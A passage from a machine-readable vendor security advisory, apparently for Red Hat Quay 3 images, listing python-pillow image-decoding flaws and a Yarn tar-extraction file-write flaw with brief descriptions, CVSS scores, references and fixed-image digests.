"text": "A flaw was discovered in python-pillow does where it does not properly restrict operations within the bounds of a memory buffer when decoding PCX images. An application that uses python-pillow to decode untrusted images may be vulnerable to this flaw, which can allow an attacker to crash the application or potentially execute code on the system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python-pillow: improperly restricted operations on memory buffer in libImaging/PcxDecode.c",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64",
"8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64",
"8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64",
"8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64",
"8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2020-5312"
},
{
"category": "external",
"summary": "RHBZ#1789533",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1789533"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2020-5312",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-5312"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-5312",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-5312"
}
],
"release_date": "2020-01-03T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-02-04T16:14:00+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64",
"8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64",
"8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64",
"8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64",
"8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:0420"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64",
"8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64",
"8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64",
"8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64",
"8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "python-pillow: improperly restricted operations on memory buffer in libImaging/PcxDecode.c"
},
{
"cve": "CVE-2020-5313",
"cwe": {
"id": "CWE-125",
"name": "Out-of-bounds Read"
},
"discovery_date": "2020-01-03T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1789532"
}
],
"notes": [
{
"category": "description",
"text": "An out-of-bounds read was discovered in python-pillow in the way it decodes FLI images. An application that uses python-pillow to load untrusted images may be vulnerable to this flaw, which can allow an attacker to read the memory of the application they should be not allowed to read.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python-pillow: out-of-bounds read in ImagingFliDecode when loading FLI images",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64",
"8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64",
"8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64",
"8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64",
"8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2020-5313"
},
{
"category": "external",
"summary": "RHBZ#1789532",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1789532"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2020-5313",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-5313"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-5313",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-5313"
}
],
"release_date": "2020-01-03T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-02-04T16:14:00+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64",
"8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64",
"8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64",
"8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64",
"8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:0420"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64",
"8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64",
"8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64",
"8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64",
"8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "python-pillow: out-of-bounds read in ImagingFliDecode when loading FLI images"
},
{
"cve": "CVE-2020-8131",
"cwe": {
"id": "CWE-77",
"name": "Improper Neutralization of Special Elements used in a Command (\u0027Command Injection\u0027)"
},
"discovery_date": "2020-02-24T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1816261"
}
],
"notes": [
{
"category": "description",
"text": "An arbitrary file write flaw was found in Yarn. This flaw allows an attacker to write files to a user\u2019s system in unexpected places, potentially leading to remote code execution. The attacker would need to first trick a developer into installing a malicious package.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "yarn: Arbitrary filesystem write via tar expansion",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Normally yarn allows packages to run postinstall scripts which can write arbitrary files to the users system. This vulnerability allows an attacker to better hide the attack and also allow arbitrary file write when postinstall scripts are disabled with the \u0027--ignore-scripts\u0027 option of \u0027yarn install\u0027.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64",
"8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64",
"8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64",
"8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64",
"8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2020-8131"
},
{
"category": "external",
"summary": "RHBZ#1816261",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1816261"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2020-8131",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-8131"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-8131",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-8131"
}
],
"release_date": "2020-02-14T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-02-04T16:14:00+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64",
"8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64",
"8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64",
"8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64",
"8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:0420"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64",
"8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64",
"8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64",
"8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64",
"8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "yarn: Arbitrary filesystem write via tar expansion"
},
{
"cve": "CVE-2020-10177",
"cwe": {
"id": "CWE-125",
"name": "Out-of-bounds Read"
},
"discovery_date": "2020-06-25T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1852824"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in python-pillow. Multiple out-of-bounds reads occur in libImaging/FliDecode.c.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python-pillow: multiple out-of-bounds reads in libImaging/FliDecode.c",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64",
"8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64",
"8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64",
"8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64",
"8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2020-10177"
},
{
"category": "external",
"summary": "RHBZ#1852824",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1852824"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2020-10177",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-10177"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-10177",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-10177"
}
],
"release_date": "2020-06-25T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-02-04T16:14:00+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64",
"8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64",
"8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64",
"8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64",
"8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:0420"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64",
"8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64",
"8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64",
